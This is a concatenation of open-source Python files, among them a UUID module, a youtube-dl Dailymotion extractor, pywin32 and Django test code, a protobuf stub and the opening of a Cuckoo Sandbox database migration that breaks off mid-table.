_last_timestamp = timestamp
if clock_seq is None:
import random
clock_seq = random.randrange(1 << 14L) # instead of stable storage
time_low = timestamp & 0xffffffffL
time_mid = (timestamp >> 32L) & 0xffffL
time_hi_version = (timestamp >> 48L) & 0x0fffL
clock_seq_low = clock_seq & 0xffL
clock_seq_hi_variant = (clock_seq >> 8L) & 0x3fL
if node is None:
node = getnode()
return UUID(fields=(time_low, time_mid, time_hi_version,
clock_seq_hi_variant, clock_seq_low, node), version=1)
def uuid3(namespace, name):
"""Generate a UUID from the MD5 hash of a namespace UUID and a name."""
try:
from hashlib import md5
except ImportError:
from md5 import md5
hash = md5(namespace.bytes + name).digest()
return UUID(bytes=hash[:16], version=3)
def uuid4():
"""Generate a random UUID."""
# When the system provides a version-4 UUID generator, use it.
if _uuid_generate_random:
_uuid_generate_random(_buffer)
return UUID(bytes=_buffer.raw)
# Otherwise, get randomness from urandom or the 'random' module.
try:
import os
return UUID(bytes=os.urandom(16), version=4)
except:
import random
bytes = [chr(random.randrange(256)) for i in range(16)]
return UUID(bytes=bytes, version=4)
def uuid5(namespace, name):
"""Generate a UUID from the SHA-1 hash of a namespace UUID and a name."""
try:
from hashlib import sha1 as sha
except ImportError:
from sha import sha
hash = sha(namespace.bytes + name).digest()
return UUID(bytes=hash[:16], version=5)
# The following standard UUIDs are for use with uuid3() or uuid5().
NAMESPACE_DNS = UUID('6ba7b810-9dad-11d1-80b4-00c04fd430c8')
NAMESPACE_URL = UUID('6ba7b811-9dad-11d1-80b4-00c04fd430c8')
NAMESPACE_OID = UUID('6ba7b812-9dad-11d1-80b4-00c04fd430c8')
NAMESPACE_X500 = UUID('6ba7b814-9dad-11d1-80b4-00c04fd430c8')
| agpl-3.0 |
vjmac15/Lyilis | lib/youtube_dl/extractor/dailymotion.py | 13 | 18180 | # coding: utf-8
from __future__ import unicode_literals
import re
import json
import itertools
from .common import InfoExtractor
from ..utils import (
determine_ext,
error_to_compat_str,
ExtractorError,
int_or_none,
parse_iso8601,
sanitized_Request,
str_to_int,
unescapeHTML,
mimetype2ext,
)
class DailymotionBaseInfoExtractor(InfoExtractor):
@staticmethod
def _build_request(url):
"""Build a request with the family filter disabled"""
request = sanitized_Request(url)
request.add_header('Cookie', 'family_filter=off; ff=off')
return request
def _download_webpage_handle_no_ff(self, url, *args, **kwargs):
request = self._build_request(url)
return self._download_webpage_handle(request, *args, **kwargs)
def _download_webpage_no_ff(self, url, *args, **kwargs):
request = self._build_request(url)
return self._download_webpage(request, *args, **kwargs)
class DailymotionIE(DailymotionBaseInfoExtractor):
_VALID_URL = r'(?i)https?://(?:(www|touch)\.)?dailymotion\.[a-z]{2,3}/(?:(?:(?:embed|swf|#)/)?video|swf)/(?P<id>[^/?_]+)'
IE_NAME = 'dailymotion'
_FORMATS = [
('stream_h264_ld_url', 'ld'),
('stream_h264_url', 'standard'),
('stream_h264_hq_url', 'hq'),
('stream_h264_hd_url', 'hd'),
('stream_h264_hd1080_url', 'hd180'),
]
_TESTS = [{
'url': 'http://www.dailymotion.com/video/x5kesuj_office-christmas-party-review-jason-bateman-olivia-munn-t-j-miller_news',
'md5': '074b95bdee76b9e3654137aee9c79dfe',
'info_dict': {
'id': 'x5kesuj',
'ext': 'mp4',
'title': 'Office Christmas Party Review – Jason Bateman, Olivia Munn, T.J. Miller',
'description': 'Office Christmas Party Review - Jason Bateman, Olivia Munn, T.J. Miller',
'thumbnail': r're:^https?:.*\.(?:jpg|png)$',
'duration': 187,
'timestamp': 1493651285,
'upload_date': '20170501',
'uploader': 'Deadline',
'uploader_id': 'x1xm8ri',
'age_limit': 0,
'view_count': int,
},
}, {
'url': 'https://www.dailymotion.com/video/x2iuewm_steam-machine-models-pricing-listed-on-steam-store-ign-news_videogames',
'md5': '2137c41a8e78554bb09225b8eb322406',
'info_dict': {
'id': 'x2iuewm',
'ext': 'mp4',
'title': 'Steam Machine Models, Pricing Listed on Steam Store - IGN News',
'description': 'Several come bundled with the Steam Controller.',
'thumbnail': r're:^https?:.*\.(?:jpg|png)$',
'duration': 74,
'timestamp': 1425657362,
'upload_date': '20150306',
'uploader': 'IGN',
'uploader_id': 'xijv66',
'age_limit': 0,
'view_count': int,
},
'skip': 'video gone',
}, {
# Vevo video
'url': 'http://www.dailymotion.com/video/x149uew_katy-perry-roar-official_musi',
'info_dict': {
'title': 'Roar (Official)',
'id': 'USUV71301934',
'ext': 'mp4',
'uploader': 'Katy Perry',
'upload_date': '20130905',
},
'params': {
'skip_download': True,
},
'skip': 'VEVO is only available in some countries',
}, {
# age-restricted video
'url': 'http://www.dailymotion.com/video/xyh2zz_leanna-decker-cyber-girl-of-the-year-desires-nude-playboy-plus_redband',
'md5': '0d667a7b9cebecc3c89ee93099c4159d',
'info_dict': {
'id': 'xyh2zz',
'ext': 'mp4',
'title': 'Leanna Decker - Cyber Girl Of The Year Desires Nude [Playboy Plus]',
'uploader': 'HotWaves1012',
'age_limit': 18,
},
'skip': 'video gone',
}, {
# geo-restricted, player v5
'url': 'http://www.dailymotion.com/video/xhza0o',
'only_matching': True,
}, {
# with subtitles
'url': 'http://www.dailymotion.com/video/x20su5f_the-power-of-nightmares-1-the-rise-of-the-politics-of-fear-bbc-2004_news',
'only_matching': True,
}, {
'url': 'http://www.dailymotion.com/swf/video/x3n92nf',
'only_matching': True,
}, {
'url': 'http://www.dailymotion.com/swf/x3ss1m_funny-magic-trick-barry-and-stuart_fun',
'only_matching': True,
}]
@staticmethod
def _extract_urls(webpage):
# Look for embedded Dailymotion player
matches = re.findall(
r'<(?:(?:embed|iframe)[^>]+?src=|input[^>]+id=[\'"]dmcloudUrlEmissionSelect[\'"][^>]+value=)(["\'])(?P<url>(?:https?:)?//(?:www\.)?dailymotion\.com/(?:embed|swf)/video/.+?)\1', webpage)
return list(map(lambda m: unescapeHTML(m[1]), matches))
def _real_extract(self, url):
video_id = self._match_id(url)
webpage = self._download_webpage_no_ff(
'https://www.dailymotion.com/video/%s' % video_id, video_id)
age_limit = self._rta_search(webpage)
description = self._og_search_description(webpage) or self._html_search_meta(
'description', webpage, 'description')
view_count_str = self._search_regex(
(r'<meta[^>]+itemprop="interactionCount"[^>]+content="UserPlays:([\s\d,.]+)"',
r'video_views_count[^>]+>\s+([\s\d\,.]+)'),
webpage, 'view count', default=None)
if view_count_str:
view_count_str = re.sub(r'\s', '', view_count_str)
view_count = str_to_int(view_count_str)
comment_count = int_or_none(self._search_regex(
r'<meta[^>]+itemprop="interactionCount"[^>]+content="UserComments:(\d+)"',
webpage, 'comment count', default=None))
player_v5 = self._search_regex(
[r'buildPlayer\(({.+?})\);\n', # See https://github.com/rg3/youtube-dl/issues/7826
r'playerV5\s*=\s*dmp\.create\([^,]+?,\s*({.+?})\);',
r'buildPlayer\(({.+?})\);',
r'var\s+config\s*=\s*({.+?});',
# New layout regex (see https://github.com/rg3/youtube-dl/issues/13580)
r'__PLAYER_CONFIG__\s*=\s*({.+?});'],
webpage, 'player v5', default=None)
if player_v5:
player = self._parse_json(player_v5, video_id)
metadata = player['metadata']
self._check_error(metadata)
formats = []
for quality, media_list in metadata['qualities'].items():
for media in media_list:
media_url = media.get('url')
if not media_url:
continue
type_ = media.get('type')
if type_ == 'application/vnd.lumberjack.manifest':
continue
ext = mimetype2ext(type_) or determine_ext(media_url)
if ext == 'm3u8':
formats.extend(self._extract_m3u8_formats(
media_url, video_id, 'mp4', preference=-1,
m3u8_id='hls', fatal=False))
elif ext == 'f4m':
formats.extend(self._extract_f4m_formats(
media_url, video_id, preference=-1, f4m_id='hds', fatal=False))
else:
f = {
'url': media_url,
'format_id': 'http-%s' % quality,
'ext': ext,
}
m = re.search(r'H264-(?P<width>\d+)x(?P<height>\d+)', media_url)
if m:
f.update({
'width': int(m.group('width')),
'height': int(m.group('height')),
})
formats.append(f)
self._sort_formats(formats)
title = metadata['title']
duration = int_or_none(metadata.get('duration'))
timestamp = int_or_none(metadata.get('created_time'))
thumbnail = metadata.get('poster_url')
uploader = metadata.get('owner', {}).get('screenname')
uploader_id = metadata.get('owner', {}).get('id')
subtitles = {}
subtitles_data = metadata.get('subtitles', {}).get('data', {})
if subtitles_data and isinstance(subtitles_data, dict):
for subtitle_lang, subtitle in subtitles_data.items():
subtitles[subtitle_lang] = [{
'ext': determine_ext(subtitle_url),
'url': subtitle_url,
} for subtitle_url in subtitle.get('urls', [])]
return {
'id': video_id,
'title': title,
'description': description,
'thumbnail': thumbnail,
'duration': duration,
'timestamp': timestamp,
'uploader': uploader,
'uploader_id': uploader_id,
'age_limit': age_limit,
'view_count': view_count,
'comment_count': comment_count,
'formats': formats,
'subtitles': subtitles,
}
# vevo embed
vevo_id = self._search_regex(
r'<link rel="video_src" href="[^"]*?vevo.com[^"]*?video=(?P<id>[\w]*)',
webpage, 'vevo embed', default=None)
if vevo_id:
return self.url_result('vevo:%s' % vevo_id, 'Vevo')
# fallback old player
embed_page = self._download_webpage_no_ff(
'https://www.dailymotion.com/embed/video/%s' % video_id,
video_id, 'Downloading embed page')
timestamp = parse_iso8601(self._html_search_meta(
'video:release_date', webpage, 'upload date'))
info = self._parse_json(
self._search_regex(
r'var info = ({.*?}),$', embed_page,
'video info', flags=re.MULTILINE),
video_id)
self._check_error(info)
formats = []
for (key, format_id) in self._FORMATS:
video_url = info.get(key)
if video_url is not None:
m_size = re.search(r'H264-(\d+)x(\d+)', video_url)
if m_size is not None:
width, height = map(int_or_none, (m_size.group(1), m_size.group(2)))
else:
width, height = None, None
formats.append({
'url': video_url,
'ext': 'mp4',
'format_id': format_id,
'width': width,
'height': height,
})
self._sort_formats(formats)
# subtitles
video_subtitles = self.extract_subtitles(video_id, webpage)
title = self._og_search_title(webpage, default=None)
if title is None:
title = self._html_search_regex(
r'(?s)<span\s+id="video_title"[^>]*>(.*?)</span>', webpage,
'title')
return {
'id': video_id,
'formats': formats,
'uploader': info['owner.screenname'],
'timestamp': timestamp,
'title': title,
'description': description,
'subtitles': video_subtitles,
'thumbnail': info['thumbnail_url'],
'age_limit': age_limit,
'view_count': view_count,
'duration': info['duration']
}
def _check_error(self, info):
error = info.get('error')
if info.get('error') is not None:
title = error['title']
# See https://developer.dailymotion.com/api#access-error
if error.get('code') == 'DM007':
self.raise_geo_restricted(msg=title)
raise ExtractorError(
'%s said: %s' % (self.IE_NAME, title), expected=True)
def _get_subtitles(self, video_id, webpage):
try:
sub_list = self._download_webpage(
'https://api.dailymotion.com/video/%s/subtitles?fields=id,language,url' % video_id,
video_id, note=False)
except ExtractorError as err:
self._downloader.report_warning('unable to download video subtitles: %s' % error_to_compat_str(err))
return {}
info = json.loads(sub_list)
if (info['total'] > 0):
sub_lang_list = dict((l['language'], [{'url': l['url'], 'ext': 'srt'}]) for l in info['list'])
return sub_lang_list
self._downloader.report_warning('video doesn\'t have subtitles')
return {}
class DailymotionPlaylistIE(DailymotionBaseInfoExtractor):
IE_NAME = 'dailymotion:playlist'
_VALID_URL = r'(?:https?://)?(?:www\.)?dailymotion\.[a-z]{2,3}/playlist/(?P<id>.+?)/'
_MORE_PAGES_INDICATOR = r'(?s)<div class="pages[^"]*">.*?<a\s+class="[^"]*?icon-arrow_right[^"]*?"'
_PAGE_TEMPLATE = 'https://www.dailymotion.com/playlist/%s/%s'
_TESTS = [{
'url': 'http://www.dailymotion.com/playlist/xv4bw_nqtv_sport/1#video=xl8v3q',
'info_dict': {
'title': 'SPORT',
'id': 'xv4bw_nqtv_sport',
},
'playlist_mincount': 20,
}]
def _extract_entries(self, id):
video_ids = set()
processed_urls = set()
for pagenum in itertools.count(1):
page_url = self._PAGE_TEMPLATE % (id, pagenum)
webpage, urlh = self._download_webpage_handle_no_ff(
page_url, id, 'Downloading page %s' % pagenum)
if urlh.geturl() in processed_urls:
self.report_warning('Stopped at duplicated page %s, which is the same as %s' % (
page_url, urlh.geturl()), id)
break
processed_urls.add(urlh.geturl())
for video_id in re.findall(r'data-xid="(.+?)"', webpage):
if video_id not in video_ids:
yield self.url_result(
'http://www.dailymotion.com/video/%s' % video_id,
DailymotionIE.ie_key(), video_id)
video_ids.add(video_id)
if re.search(self._MORE_PAGES_INDICATOR, webpage) is None:
break
def _real_extract(self, url):
mobj = re.match(self._VALID_URL, url)
playlist_id = mobj.group('id')
webpage = self._download_webpage(url, playlist_id)
return {
'_type': 'playlist',
'id': playlist_id,
'title': self._og_search_title(webpage),
'entries': self._extract_entries(playlist_id),
}
class DailymotionUserIE(DailymotionPlaylistIE):
IE_NAME = 'dailymotion:user'
_VALID_URL = r'https?://(?:www\.)?dailymotion\.[a-z]{2,3}/(?!(?:embed|swf|#|video|playlist)/)(?:(?:old/)?user/)?(?P<user>[^/]+)'
_PAGE_TEMPLATE = 'http://www.dailymotion.com/user/%s/%s'
_TESTS = [{
'url': 'https://www.dailymotion.com/user/nqtv',
'info_dict': {
'id': 'nqtv',
'title': 'Rémi Gaillard',
},
'playlist_mincount': 100,
}, {
'url': 'http://www.dailymotion.com/user/UnderProject',
'info_dict': {
'id': 'UnderProject',
'title': 'UnderProject',
},
'playlist_mincount': 1800,
'expected_warnings': [
'Stopped at duplicated page',
],
'skip': 'Takes too long time',
}]
def _real_extract(self, url):
mobj = re.match(self._VALID_URL, url)
user = mobj.group('user')
webpage = self._download_webpage(
'https://www.dailymotion.com/user/%s' % user, user)
full_user = unescapeHTML(self._html_search_regex(
r'<a class="nav-image" title="([^"]+)" href="/%s">' % re.escape(user),
webpage, 'user'))
return {
'_type': 'playlist',
'id': user,
'title': full_user,
'entries': self._extract_entries(user),
}
class DailymotionCloudIE(DailymotionBaseInfoExtractor):
_VALID_URL_PREFIX = r'https?://api\.dmcloud\.net/(?:player/)?embed/'
_VALID_URL = r'%s[^/]+/(?P<id>[^/?]+)' % _VALID_URL_PREFIX
_VALID_EMBED_URL = r'%s[^/]+/[^\'"]+' % _VALID_URL_PREFIX
_TESTS = [{
# From http://www.francetvinfo.fr/economie/entreprises/les-entreprises-familiales-le-secret-de-la-reussite_933271.html
# Tested at FranceTvInfo_2
'url': 'http://api.dmcloud.net/embed/4e7343f894a6f677b10006b4/556e03339473995ee145930c?auth=1464865870-0-jyhsm84b-ead4c701fb750cf9367bf4447167a3db&autoplay=1',
'only_matching': True,
}, {
# http://www.francetvinfo.fr/societe/larguez-les-amarres-le-cobaturage-se-developpe_980101.html
'url': 'http://api.dmcloud.net/player/embed/4e7343f894a6f677b10006b4/559545469473996d31429f06?auth=1467430263-0-90tglw2l-a3a4b64ed41efe48d7fccad85b8b8fda&autoplay=1',
'only_matching': True,
}]
@classmethod
def _extract_dmcloud_url(cls, webpage):
mobj = re.search(r'<iframe[^>]+src=[\'"](%s)[\'"]' % cls._VALID_EMBED_URL, webpage)
if mobj:
return mobj.group(1)
mobj = re.search(
r'<input[^>]+id=[\'"]dmcloudUrlEmissionSelect[\'"][^>]+value=[\'"](%s)[\'"]' % cls._VALID_EMBED_URL,
webpage)
if mobj:
return mobj.group(1)
def _real_extract(self, url):
video_id = self._match_id(url)
webpage = self._download_webpage_no_ff(url, video_id)
title = self._html_search_regex(r'<title>([^>]+)</title>', webpage, 'title')
video_info = self._parse_json(self._search_regex(
r'var\s+info\s*=\s*([^;]+);', webpage, 'video info'), video_id)
# TODO: parse ios_url, which is in fact a manifest
video_url = video_info['mp4_url']
return {
'id': video_id,
'url': video_url,
'title': title,
'thumbnail': video_info.get('thumbnail_url'),
}
| gpl-3.0 |
chvrga/outdoor-explorer | java/play-1.4.4/python/Lib/site-packages/win32/lib/win32traceutil.py | 9 | 1528 | # This is a helper for the win32trace module
# If imported from a normal Python program, it sets up sys.stdout and sys.stderr
# so output goes to the collector.
# If run from the command line, it creates a collector loop.
# Eg:
# C:>start win32traceutil.py (or python.exe win32traceutil.py)
# will start a process with a (pretty much) blank screen.
#
# then, switch to a DOS prompt, and type:
# C:>python.exe
# Python 1.4 etc...
# >>> import win32traceutil
# Redirecting output to win32trace remote collector
# >>> print "Hello"
# >>>
# And the output will appear in the first collector process.
# Note - the client or the collector can be started first.
# There is a 0x20000 byte buffer. If this gets full, it is reset, and new
# output appended from the start.
import win32trace
def RunAsCollector():
import sys
try:
import win32api
win32api.SetConsoleTitle("Python Trace Collector")
except:
pass # Oh well!
win32trace.InitRead()
print "Collecting Python Trace Output..."
try:
while 1:
# a short timeout means ctrl+c works next time we wake...
sys.stdout.write(win32trace.blockingread(500))
except KeyboardInterrupt:
print "Ctrl+C"
def SetupForPrint():
win32trace.InitWrite()
try: # Under certain servers, sys.stdout may be invalid.
print "Redirecting output to win32trace remote collector"
except:
pass
win32trace.setprint() # this works in an rexec environment.
if __name__=='__main__':
RunAsCollector()
else:
SetupForPrint()
| mit |
hawken93/mplayerhq | TOOLS/vobshift.py | 71 | 1048 | #!/usr/bin/env python
#usage:
#
# vobshift.py in.idx out.idx -8.45
#
# this will read in in.idx,shift it by 8.45 seconds back,
# and save it as out.idx
#
# license: i don't care ;)
#
import datetime
import sys
def tripletize(line):
begin = line[:11]
middle = line[11:23]
end = line[23:]
return (begin,middle,end)
def text2delta(t):
h = int( t[0:2] )
m = int( t[3:5] )
s = int( t[6:8] )
milli = int( t[9:12] )
return datetime.timedelta(hours=h,minutes=m,seconds=s,milliseconds=milli)
def delta2text(d):
t = str(d)
milli = t[8:11]
if len(milli) == 0: #fix for .000 seconds
milli = '000'
return '0'+t[:7]+':'+milli
def shift(line,seconds):
triplet = tripletize(line)
base = text2delta(triplet[1])
base = base + datetime.timedelta(seconds=seconds)
base = delta2text(base)
return triplet[0]+base+triplet[2]
INFILE =sys.argv[1]
OUTFILE =sys.argv[2]
DIFF =float(sys.argv[3])
o = open(OUTFILE,'wt')
for line in open(INFILE):
if line.startswith('timestamp'):
line = shift(line,DIFF)
o.write(line)
o.close()
| gpl-2.0 |
aprefontaine/TMScheduler | tests/regressiontests/forms/localflavor/uy.py | 14 | 2014 | # -*- coding: utf-8 -*-
# Tests for the contrib/localflavor/ UY form fields.
tests = r"""
# UYDepartamentSelect #########################################################
>>> from django.contrib.localflavor.uy.forms import UYDepartamentSelect
>>> f = UYDepartamentSelect()
>>> f.render('departamentos', 'S')
u'<select name="departamentos">\n<option value="G">Artigas</option>\n<option value="A">Canelones</option>\n<option value="E">Cerro Largo</option>\n<option value="L">Colonia</option>\n<option value="Q">Durazno</option>\n<option value="N">Flores</option>\n<option value="O">Florida</option>\n<option value="P">Lavalleja</option>\n<option value="B">Maldonado</option>\n<option value="S" selected="selected">Montevideo</option>\n<option value="I">Paysand\xfa</option>\n<option value="J">R\xedo Negro</option>\n<option value="F">Rivera</option>\n<option value="C">Rocha</option>\n<option value="H">Salto</option>\n<option value="M">San Jos\xe9</option>\n<option value="K">Soriano</option>\n<option value="R">Tacuaremb\xf3</option>\n<option value="D">Treinta y Tres</option>\n</select>'
# UYCIField ###################################################################
>>> from django.contrib.localflavor.uy.util import get_validation_digit
>>> get_validation_digit(409805) == 3
True
>>> get_validation_digit(1005411) == 2
True
>>> from django.contrib.localflavor.uy.forms import UYCIField
>>> f = UYCIField()
>>> f.clean('4098053')
u'4098053'
>>> f.clean('409805-3')
u'409805-3'
>>> f.clean('409.805-3')
u'409.805-3'
>>> f.clean('10054112')
u'10054112'
>>> f.clean('1005411-2')
u'1005411-2'
>>> f.clean('1.005.411-2')
u'1.005.411-2'
>>> f.clean('foo')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid CI number in X.XXX.XXX-X,XXXXXXX-X or XXXXXXXX format.']
>>> f.clean('409805-2')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid CI number.']
>>> f.clean('1.005.411-5')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid CI number.']
"""
| bsd-3-clause |
earshel/PokeyPyManager | POGOProtos/Networking/Requests/Messages/DownloadRemoteConfigVersionMessage_pb2.py | 16 | 4749 | # Generated by the protocol buffer compiler. DO NOT EDIT!
# source: POGOProtos/Networking/Requests/Messages/DownloadRemoteConfigVersionMessage.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from POGOProtos.Enums import Platform_pb2 as POGOProtos_dot_Enums_dot_Platform__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='POGOProtos/Networking/Requests/Messages/DownloadRemoteConfigVersionMessage.proto',
package='POGOProtos.Networking.Requests.Messages',
syntax='proto3',
serialized_pb=_b('\nPPOGOProtos/Networking/Requests/Messages/DownloadRemoteConfigVersionMessage.proto\x12\'POGOProtos.Networking.Requests.Messages\x1a\x1fPOGOProtos/Enums/Platform.proto\"\xaa\x01\n\"DownloadRemoteConfigVersionMessage\x12,\n\x08platform\x18\x01 \x01(\x0e\x32\x1a.POGOProtos.Enums.Platform\x12\x1b\n\x13\x64\x65vice_manufacturer\x18\x02 \x01(\t\x12\x14\n\x0c\x64\x65vice_model\x18\x03 \x01(\t\x12\x0e\n\x06locale\x18\x04 \x01(\t\x12\x13\n\x0b\x61pp_version\x18\x05 \x01(\rb\x06proto3')
,
dependencies=[POGOProtos_dot_Enums_dot_Platform__pb2.DESCRIPTOR,])
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
_DOWNLOADREMOTECONFIGVERSIONMESSAGE = _descriptor.Descriptor(
name='DownloadRemoteConfigVersionMessage',
full_name='POGOProtos.Networking.Requests.Messages.DownloadRemoteConfigVersionMessage',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='platform', full_name='POGOProtos.Networking.Requests.Messages.DownloadRemoteConfigVersionMessage.platform', index=0,
number=1, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='device_manufacturer', full_name='POGOProtos.Networking.Requests.Messages.DownloadRemoteConfigVersionMessage.device_manufacturer', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='device_model', full_name='POGOProtos.Networking.Requests.Messages.DownloadRemoteConfigVersionMessage.device_model', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='locale', full_name='POGOProtos.Networking.Requests.Messages.DownloadRemoteConfigVersionMessage.locale', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='app_version', full_name='POGOProtos.Networking.Requests.Messages.DownloadRemoteConfigVersionMessage.app_version', index=4,
number=5, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=159,
serialized_end=329,
)
_DOWNLOADREMOTECONFIGVERSIONMESSAGE.fields_by_name['platform'].enum_type = POGOProtos_dot_Enums_dot_Platform__pb2._PLATFORM
DESCRIPTOR.message_types_by_name['DownloadRemoteConfigVersionMessage'] = _DOWNLOADREMOTECONFIGVERSIONMESSAGE
DownloadRemoteConfigVersionMessage = _reflection.GeneratedProtocolMessageType('DownloadRemoteConfigVersionMessage', (_message.Message,), dict(
DESCRIPTOR = _DOWNLOADREMOTECONFIGVERSIONMESSAGE,
__module__ = 'POGOProtos.Networking.Requests.Messages.DownloadRemoteConfigVersionMessage_pb2'
# @@protoc_insertion_point(class_scope:POGOProtos.Networking.Requests.Messages.DownloadRemoteConfigVersionMessage)
))
_sym_db.RegisterMessage(DownloadRemoteConfigVersionMessage)
# @@protoc_insertion_point(module_scope)
| mit |
chubbymaggie/CuckooSploit | utils/db_migration/versions/from_0_6_to_1_1.py | 6 | 14422 | # Copyright (C) 2010-2015 Cuckoo Foundation.
# This file is part of Cuckoo Sandbox - http://www.cuckoosandbox.org
# See the file 'docs/LICENSE' for copying permission.
"""Database migration from Cuckoo 0.6 to Cuckoo 1.1.
Revision ID: 263a45963c72
Revises: None
Create Date: 2014-03-23 23:30:36.756792
"""
# Revision identifiers, used by Alembic.
revision = "263a45963c72"
mongo_revision = "1"
down_revision = None
import os
import sys
import sqlalchemy as sa
from datetime import datetime
try:
from dateutil.parser import parse
except ImportError:
print "Unable to import dateutil.parser",
print "(install with `pip install python-dateutil`)"
sys.exit()
try:
from alembic import op
except ImportError:
print "Unable to import alembic (install with `pip install alembic`)"
sys.exit()
try:
from pymongo.connection import Connection
from pymongo.errors import ConnectionFailure
except ImportError:
print "Unable to import pymongo (install with `pip install pymongo`)"
sys.exit()
sys.path.append(os.path.join("..", ".."))
import lib.cuckoo.core.database as db
from lib.cuckoo.common.config import Config
def upgrade():
# BEWARE: be prepared to really spaghetti code. To deal with SQLite limitations in Alembic we coded some workarounds.
# Migrations are supported starting form Cuckoo 0.6 and Cuckoo 1.0; I need a way to figure out if from which release
# it will start because both schema are missing alembic release versioning.
# I check for tags table to distinguish between Cuckoo 0.6 and 1.0.
conn = op.get_bind()
if conn.engine.dialect.has_table(conn.engine.connect(), "machines_tags"):
# If this table exist we are on Cuckoo 1.0 or above.
# So skip SQL migration.
pass
else:
# We are on Cuckoo < 1.0, hopefully 0.6.
# So run SQL migration.
# Create table used by Tag.
op.create_table(
"tags",
sa.Column("id", sa.Integer(), primary_key=True),
sa.Column("name", sa.String(length=255), nullable=False, unique=True),
)
# Create secondary table used in association Machine - Tag.
op.create_table(
"machines_tags",
sa.Column("machine_id", sa.Integer, sa.ForeignKey("machines.id")),
sa.Column("tag_id", sa.Integer, sa.ForeignKey("tags.id")),
)
# Add columns to Machine.
op.add_column("machines", sa.Column("interface", sa.String(length=255), nullable=True))
op.add_column("machines", sa.Column("snapshot", sa.String(length=255), nullable=True))
# TODO: change default value, be aware sqlite doesn't support that kind of ALTER statement.
op.add_column("machines", sa.Column("resultserver_ip", sa.String(length=255), server_default="192.168.56.1", nullable=False))
# TODO: change default value, be aware sqlite doesn't support that kind of ALTER statement.
op.add_column("machines", sa.Column("resultserver_port", sa.String(length=255), server_default="2042", nullable=False))
# Deal with Alembic shit.
# Alembic is so ORMish that it was impossible to write code which works on different DBMS.
if conn.engine.driver == "psycopg2":
# We don"t provide a default value and leave the column as nullable because o further data migration.
op.add_column("tasks", sa.Column("clock", sa.DateTime(timezone=False),nullable=True))
# NOTE: We added this new column so we force clock time to the added_on for old analyses.
conn.execute("update tasks set clock=added_on")
# Add the not null constraint.
op.alter_column("tasks", "clock", nullable=False, existing_nullable=True)
# Altering status ENUM.
# This shit of raw SQL is here because alembic doesn't deal well with alter_colum of ENUM type.
op.execute('COMMIT') # Commit because SQLAlchemy doesn't support ALTER TYPE in a transaction.
conn.execute("ALTER TYPE status_type ADD VALUE 'completed'")
conn.execute("ALTER TYPE status_type ADD VALUE 'reported'")
conn.execute("ALTER TYPE status_type ADD VALUE 'recovered'")
conn.execute("ALTER TYPE status_type ADD VALUE 'running'")
conn.execute("ALTER TYPE status_type RENAME ATTRIBUTE success TO completed")
conn.execute("ALTER TYPE status_type DROP ATTRIBUTE IF EXISTS failure")
elif conn.engine.driver == "mysqldb":
# We don"t provide a default value and leave the column as nullable because o further data migration.
op.add_column("tasks", sa.Column("clock", sa.DateTime(timezone=False),nullable=True))
# NOTE: We added this new column so we force clock time to the added_on for old analyses.
conn.execute("update tasks set clock=added_on")
# Add the not null constraint.
op.alter_column("tasks", "clock", nullable=False, existing_nullable=True, existing_type=sa.DateTime(timezone=False))
# NOTE: To workaround limitations in Alembic and MySQL ALTER statement (cannot remove item from ENUM).
# Read data.
tasks_data = []
old_tasks = conn.execute("select id, target, category, timeout, priority, custom, machine, package, options, platform, memory, enforce_timeout, added_on, started_on, completed_on, status, sample_id from tasks").fetchall()
for item in old_tasks:
d = {}
d["id"] = item[0]
d["target"] = item[1]
d["category"] = item[2]
d["timeout"] = item[3]
d["priority"] = item[4]
d["custom"] = item[5]
d["machine"] = item[6]
d["package"] = item[7]
d["options"] = item[8]
d["platform"] = item[9]
d["memory"] = item[10]
d["enforce_timeout"] = item[11]
if isinstance(item[12], datetime):
d["added_on"] = item[12]
else:
d["added_on"] = parse(item[12])
if isinstance(item[13], datetime):
d["started_on"] = item[13]
else:
d["started_on"] = parse(item[13])
if isinstance(item[14], datetime):
d["completed_on"] = item[14]
else:
d["completed_on"] = parse(item[14])
d["status"] = item[15]
d["sample_id"] = item[16]
# Force clock.
# NOTE: We added this new column so we force clock time to the added_on for old analyses.
d["clock"] = d["added_on"]
# Enum migration, "success" isn"t a valid state now.
if d["status"] == "success":
d["status"] = "completed"
tasks_data.append(d)
# Rename original table.
op.rename_table("tasks", "old_tasks")
# Drop old table.
op.drop_table("old_tasks")
# Drop old Enum.
sa.Enum(name="status_type").drop(op.get_bind(), checkfirst=False)
# Create new table with 1.0 schema.
op.create_table(
"tasks",
sa.Column("id", sa.Integer(), nullable=False),
sa.Column("target", sa.String(length=255), nullable=False),
sa.Column("category", sa.String(length=255), nullable=False),
sa.Column("timeout", sa.Integer(), server_default="0", nullable=False),
sa.Column("priority", sa.Integer(), server_default="1", nullable=False),
sa.Column("custom", sa.String(length=255), nullable=True),
